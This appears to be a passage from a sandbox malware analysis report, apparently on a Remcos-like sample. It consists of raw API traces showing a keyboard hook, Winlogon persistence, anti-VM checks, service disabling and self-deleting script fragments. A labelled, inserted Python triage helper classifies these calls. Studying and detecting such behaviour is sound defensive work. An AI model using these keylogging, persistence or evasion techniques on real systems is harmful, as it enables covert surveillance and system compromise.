                                                  • Part of subcall function 004035C3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403677
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403680
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403689
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,00000000), ref: 0040C86D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 0040C877
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 0040C891
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040C89D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V?$basic_string@$D@1@@$DriveV10@V10@0@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@?find@?$basic_string@?resize@?$basic_string@LogicalStringsTypeV01@_itoalstrlen
                                                • String ID:
                                                • API String ID: 2656034736-0
                                                • Opcode ID: c5a30c28f081b53d22712db1f35a8f3ad6d8e5914f878b8807aa6eaa511786cd
                                                • Instruction ID: cec02d61d978296592b09cac4e61c212ec31f5845d3c6e7b9dfb66180788be86
                                                • Opcode Fuzzy Hash: c5a30c28f081b53d22712db1f35a8f3ad6d8e5914f878b8807aa6eaa511786cd
                                                • Instruction Fuzzy Hash: 8C21FF71900119ABCF14EBA1DD59EEE7778FB14706F00416AF106A2091DB789749CF69
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 00411FDC
                                                  • Part of subcall function 0040AA65: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                  • Part of subcall function 0040AA65: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                  • Part of subcall function 0040AA65: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                  • Part of subcall function 0040AA65: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                  • Part of subcall function 0040AA65: RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                  • Part of subcall function 0040AA65: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413980,?,00000001), ref: 00412020
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00414D10,?,00000001), ref: 0041205B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004135D4,?,00000001), ref: 00412096
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 004120D8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?), ref: 00412103
                                                • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00412121
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                • API String ID: 3561681748-3576401099
                                                • Opcode ID: d15b552b0ff96c2e3ef3e3d67bb2551a8713380eee93f4aaef4a43ae2b9f4088
                                                • Instruction ID: 8b8d483cb975bd7c8b4f59007ff54bd2d8bfc25679939a196059c40ca2960ee2
                                                • Opcode Fuzzy Hash: d15b552b0ff96c2e3ef3e3d67bb2551a8713380eee93f4aaef4a43ae2b9f4088
                                                • Instruction Fuzzy Hash: 8441B371B402447BEF10B6A59D47FEE7A29D784B01F2440AAFD00A72C1D6A94B9487EF
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00419288,?,?,004102C8), ref: 00410C22
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,004102C8), ref: 00410C2F
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,004102C8), ref: 00410C37
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C44
                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004102C8), ref: 00410C75
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C87
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C8A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004102C8), ref: 00410C8F
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                                • String ID:
                                                • API String ID: 760094045-0
                                                • Opcode ID: 896137ecff22d8b733aee0b2001e32bf22ef65779910e7bd50aa1f8dd93b730b
                                                • Instruction ID: b905c81bb435b8b08ff8893919c5d8bc3af143f33ace95a5df3eda7690bc98c4
                                                • Opcode Fuzzy Hash: 896137ecff22d8b733aee0b2001e32bf22ef65779910e7bd50aa1f8dd93b730b
                                                • Instruction Fuzzy Hash: 1E01B5711441287EE6245F24AC8DEFB3E9CEB05372F104326F562922D4EAA44EC189E9
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00419288,?,?,004105FC), ref: 004109FB
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,004105FC), ref: 00410A08
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,004105FC), ref: 00410A10
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004105FC), ref: 00410A1D
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,004105FC), ref: 00410A28
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004105FC), ref: 00410A3A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004105FC), ref: 00410A3D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004105FC), ref: 00410A42
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                                • String ID:
                                                • API String ID: 3595611540-0
                                                • Opcode ID: 56d2056f5bdd1eeb955607b5ac70afe04ab9bfe9c70f89a70381f090165afb6e
                                                • Instruction ID: 510facd3668c7bf20710016c10a36eeb679cfddf894c6ad20c64923cde8d7e83
                                                • Opcode Fuzzy Hash: 56d2056f5bdd1eeb955607b5ac70afe04ab9bfe9c70f89a70381f090165afb6e
                                                • Instruction Fuzzy Hash: B3F096711002287FD310AF74AC88EFF3FACEF492A67004035F54683154DB745E419AA9
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040E7EC
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040E7F3
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040E805
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040E824
                                                • GetLastError.KERNEL32 ref: 0040E82A
                                                Similarity
                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 3534403312-3733053543
                                                • Opcode ID: def6256831d5847bd4d82568696012a8f3b809a28ee4d41b66c3a5e2a3bc5846
                                                • Instruction ID: 2fbdfd1633e78bfdff91efd60dbd587e0571d9bf435aa96d0aa0dc2af2570fac
                                                • Opcode Fuzzy Hash: def6256831d5847bd4d82568696012a8f3b809a28ee4d41b66c3a5e2a3bc5846
                                                • Instruction Fuzzy Hash: 78F017B1841129BBDB109FA4DC0DEEF7EACEF09346F104020B506E1058D6709B04CBA5
                                                APIs
                                                • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409389
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 00409394
                                                • LockResource.KERNEL32(00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 0040939B
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 004093A6
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID: SETTINGS
                                                • API String ID: 3473537107-594951305
                                                • Opcode ID: 737ec9e2198e06504fd06a266f0158e6e1d183d0d61edb8b67e886450d5fa4dd
                                                • Instruction ID: 07cbcd12a54a6b67beaae60ad80ce7deea8c4263d55decee55ac0f9cd3ab5bff
                                                • Opcode Fuzzy Hash: 737ec9e2198e06504fd06a266f0158e6e1d183d0d61edb8b67e886450d5fa4dd
                                                • Instruction Fuzzy Hash: C0E0BF31641314B7D6105FA5AC0DFD67EA8EB8AF67F0040A5F609971D4C5754501C6A9
                                                APIs
                                                • SetWindowsHookExA.USER32(0000000D,00404628,00000000,00000000), ref: 00404662
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404675
                                                • TranslateMessage.USER32(?), ref: 00404683
                                                • DispatchMessageA.USER32(?), ref: 0040468D
                                                Similarity
                                                • API ID: Message$DispatchHookTranslateWindows
                                                • String ID:
                                                • API String ID: 1978648212-0
                                                • Opcode ID: 341cf3b028638e3b1a546a5b1252c3d72e222849a4c6be8ccf96663d124796d0
                                                • Instruction ID: 4cd8b305e0da813772aec68583d1d63533f4a2342e85b929db5e86862b694621
                                                • Opcode Fuzzy Hash: 341cf3b028638e3b1a546a5b1252c3d72e222849a4c6be8ccf96663d124796d0
                                                • Instruction Fuzzy Hash: F6F030B2900205ABCB216FB69D0CD9BBAFCEBD6B02B10493AF545E2194F679C541C768
                                                APIs
                                                • GetKeyState.USER32(00000014), ref: 004046EF
                                                • GetKeyState.USER32(00000014), ref: 004046F8
                                                  • Part of subcall function 00405E09: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413BA4,?), ref: 00405E89
                                                • CallNextHookEx.USER32(?,00000000,?,?), ref: 0040473B
                                                Similarity
                                                • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                                • String ID:
                                                • API String ID: 98962008-0
                                                • Opcode ID: fa411fc1fe71c20f72ddbd772969b67c47a1eda3438ef8c3babd2298f57bd1bb
                                                • Instruction ID: b41be4409a5ee48be4a62fd8abeb9a86d681804794a4f204e27c4e5540bebde6
                                                • Opcode Fuzzy Hash: fa411fc1fe71c20f72ddbd772969b67c47a1eda3438ef8c3babd2298f57bd1bb
                                                • Instruction Fuzzy Hash: 0611EFB22002498BDF04AF75DC907AF3A01AB86304F44143FFA022B2C7CB7C88159B9D
                                                Similarity
                                                • API ID:
                                                • String ID: hXMV$hXMV
                                                • API String ID: 0-400149659
                                                • Opcode ID: 69a08d5a59ab442faeb0d6c3e5eb8ce1b4f31785523e65d5647d420553a615a2
                                                • Instruction ID: 926b6984aa507745523806bda2f731cca1c3a495343a670e325394b4b3d9c0a4
                                                • Opcode Fuzzy Hash: 69a08d5a59ab442faeb0d6c3e5eb8ce1b4f31785523e65d5647d420553a615a2
                                                • Instruction Fuzzy Hash: E3F0F676E08785ABD7048B49DD52BAFFFB8E745B20F30462AE021636C0C27919018AA0
                                                APIs
                                                • GetKeyboardLayout.USER32(00000000), ref: 004044C8
                                                Similarity
                                                • API ID: KeyboardLayout
                                                • String ID:
                                                • API String ID: 194098044-0
                                                • Opcode ID: 92df64862e0399f095fe3136b64df33a7df8f5764fe28625e25afe133ee355aa
                                                • Instruction ID: 8a961c64fc0d533677a6add63cef3dd5ea5ec253bc5db06cec8c561a27389ce6
                                                • Opcode Fuzzy Hash: 92df64862e0399f095fe3136b64df33a7df8f5764fe28625e25afe133ee355aa
                                                • Instruction Fuzzy Hash: 1ED0A77B9483201FFB74BB19B9427E52680EB90731F96803BE6811BAD4D4E46AC24268
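The function records above are raw API traces; what each one does only becomes clear once the numeric arguments are read against the Windows SDK constants (0000000D passed to SetWindowsHookExA is WH_KEYBOARD_LL; 00000014 is VK_CAPITAL for GetKeyState and SPI_SETDESKWALLPAPER for SystemParametersInfoW; 0000000A in FindResourceA is RT_RCDATA; 80000002 is HKEY_LOCAL_MACHINE; 00000004 as the start type in ChangeServiceConfigW is SERVICE_DISABLED) and once the odd string hXMV is recognised as the little-endian in-memory form of 0x564D5868, the 'VMXh' magic that the VMware backdoor expects in EAX before the IN instruction on port 0x5658. The following Python triage helper is an added example and is not part of this report or of Joe Sandbox: it parses API bullets and String ID lines in the format shown on this page and emits one finding per recognised technique. The sample lines are copied from the records above; the rule set and category names are assumptions made for illustration.

```python
"""Triage helper for Joe Sandbox function-level API listings (added example,
not part of the report or of Joe Sandbox). Parses the "APIs" bullets and
"String ID" lines shown above and names the technique behind each record."""
import re
from typing import Optional

# "• Name.MODULE(arg,...), ref: ADDR", optionally prefixed "Part of subcall function ADDR:".
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?"                     # GetLastError has no argument list
    r"\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
STRING_RE = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<ids>.*)$")

# Windows SDK constants the rules rely on.
HKEY_LOCAL_MACHINE = 0x80000002
WH_KEYBOARD_LL = 13
VK_CAPITAL = 0x14
RT_RCDATA = 10
SPI_SETDESKWALLPAPER = 0x14
SERVICE_DISABLED = 4
VMWARE_MAGIC = 0x564D5868  # 'VMXh' in EAX before IN on port 0x5658 (VMware backdoor)

def parse_arg(tok: str):
    """8 hex digits -> int, '?' -> None, anything else is a recovered string."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):   # an all-hex 8-char string is ambiguous
        return int(tok, 16)
    return tok

def parse_call(line: str) -> Optional[dict]:
    m = CALL_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return {"api": m.group("api"), "mod": m.group("mod"), "args": args,
            "ref": m.group("ref"), "subcall": m.group("sub")}

def findings(lines):
    """De-duplicated (category, detail) pairs for the techniques recognised."""
    out = []
    for line in lines:
        c = parse_call(line)
        if c is None:
            m = STRING_RE.match(line)
            if m and m.group("ids").strip():
                for s in m.group("ids").split("$"):
                    # 'hXMV' in memory is the DWORD 0x564D5868 ('VMXh') stored little-endian.
                    if len(s) == 4 and int.from_bytes(s.encode("latin-1"), "little") == VMWARE_MAGIC:
                        out.append(("anti-vm", f"{s!r} is little-endian 'VMXh' (VMware backdoor magic)"))
            continue
        api, a = c["api"], c["args"]
        strs = [x for x in a if isinstance(x, str)]
        if (api == "RegSetValueExA" and HKEY_LOCAL_MACHINE in a and "Userinit" in strs
                and any("Winlogon" in s for s in strs)):
            out.append(("persistence", "HKLM Winlogon\\Userinit rewritten"))
        elif api == "SetWindowsHookExA" and a[:1] == [WH_KEYBOARD_LL]:
            proc = f"{a[1]:08X}" if len(a) > 1 and isinstance(a[1], int) else "?"
            scope = "system-wide (dwThreadId 0)" if a[3:4] == [0] else "thread-scoped"
            out.append(("keylogging", f"WH_KEYBOARD_LL hook, proc {proc}, {scope}"))
        elif api == "GetKeyState" and a[:1] == [VK_CAPITAL]:
            out.append(("keylogging", "caps-lock state queried (VK_CAPITAL)"))
        elif api == "FindResourceA" and a[2:3] == [RT_RCDATA] and len(strs) == 1:
            out.append(("config", f"RT_RCDATA resource {strs[0]!r} located"))
        elif api == "SystemParametersInfoW" and a[:1] == [SPI_SETDESKWALLPAPER]:
            out.append(("impact", "desktop wallpaper replaced (SPI_SETDESKWALLPAPER)"))
        elif api == "ChangeServiceConfigW" and a[2:3] == [SERVICE_DISABLED]:
            out.append(("defense-evasion", "service start type set to SERVICE_DISABLED"))
        elif api == "LookupPrivilegeValueA" and "SeShutdownPrivilege" in strs:
            out.append(("privilege", "SeShutdownPrivilege looked up for AdjustTokenPrivileges"))
    return list(dict.fromkeys(out))

REPORT_LINES = [  # copied from the function records above
    "• Part of subcall function 0040AA65: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72",
    "• Part of subcall function 0040AA65: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,"
    "80000002,Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\,Userinit), ref: 0040AA9E",
    "• SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00412121",
    "• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,"
    "00000000,00000000,00000000,00000000,?,?,004102C8), ref: 00410C75",
    "• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040E805",
    "• GetLastError.KERNEL32 ref: 0040E82A",
    "• FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409389",
    "• SetWindowsHookExA.USER32(0000000D,00404628,00000000,00000000), ref: 00404662",
    "• GetKeyState.USER32(00000014), ref: 004046EF",
    "• GetKeyState.USER32(00000014), ref: 004046F8",
    "• String ID: hXMV$hXMV",
]

if __name__ == "__main__":
    for category, detail in findings(REPORT_LINES):
        print(f"{category:16} {detail}")
```

Running it over the excerpt yields eight findings: the Winlogon\Userinit write under HKLM, the wallpaper change, the service set to SERVICE_DISABLED, the SeShutdownPrivilege lookup, the SETTINGS RCDATA resource (where Remcos keeps its encrypted configuration), the system-wide low-level keyboard hook together with the caps-lock query that accompanies it, and the VMware magic. Joe Sandbox recovers arguments heuristically, so a rule should key on the argument positions that are stable (the first argument of SetWindowsHookExA, the third of FindResourceA and ChangeServiceConfigW) rather than on every value in the list.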
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90

Control-flow Graph: function 00407AD4 (basic blocks 00407AD4 through 00407F30, coloured Executed / Not Executed in the rendered graph, which does not survive in text). Calls along the path, in order: subcall 0040A109, subcall 00406079, subcall 004100C6, basic_string c_str/size accessors (MSVCP60), subcalls 0040AD45 and 0040AA65, subcall 0040A9EF, GetModuleFileNameW, RegDeleteKeyA, SetFileAttributesW, wide-string comparison and concatenation (MSVCP60), _wgetenv, SetFileAttributesW, subcall 004118F7, ShellExecuteW, exit.
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407B14
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407B36
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407B5B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00000000,004137F0,6C9BB310), ref: 00407B8A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00000000,004137F0,6C9BB310), ref: 00407BB8
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407BD8
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,004137F0,6C9BB310), ref: 00407BF4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BFD
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000208,00000000), ref: 00407C1D
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00407C40
                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045F8,00000000,00000000,004137F0,00407AF8,00000000,004137F0,6C9BB310), ref: 0040608E
                                                  • Part of subcall function 00406079: UnhookWindowsHookEx.USER32(00000000), ref: 00406097
                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045D8,00000000), ref: 004060A7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407C4A
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00407C52
                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00407C6E
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 00407C83
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00407C99
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00407CA0
                                                • _wgetenv.MSVCRT ref: 00407CB0
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00407CBB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407CC6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407CD1
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00407CE3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00407CF3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407CFE
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00407D1D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00407D2D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407D3A
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407D46
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407D4F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407D58
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407D61
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00414294), ref: 00407D80
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407D8B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407D98
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407DA4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407DAD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407DB6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407DBF
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00407DD3
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 00407DDB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",00419BA0,00414294), ref: 00407DF2
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00414294), ref: 00407DFF
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00414294), ref: 00407E0B
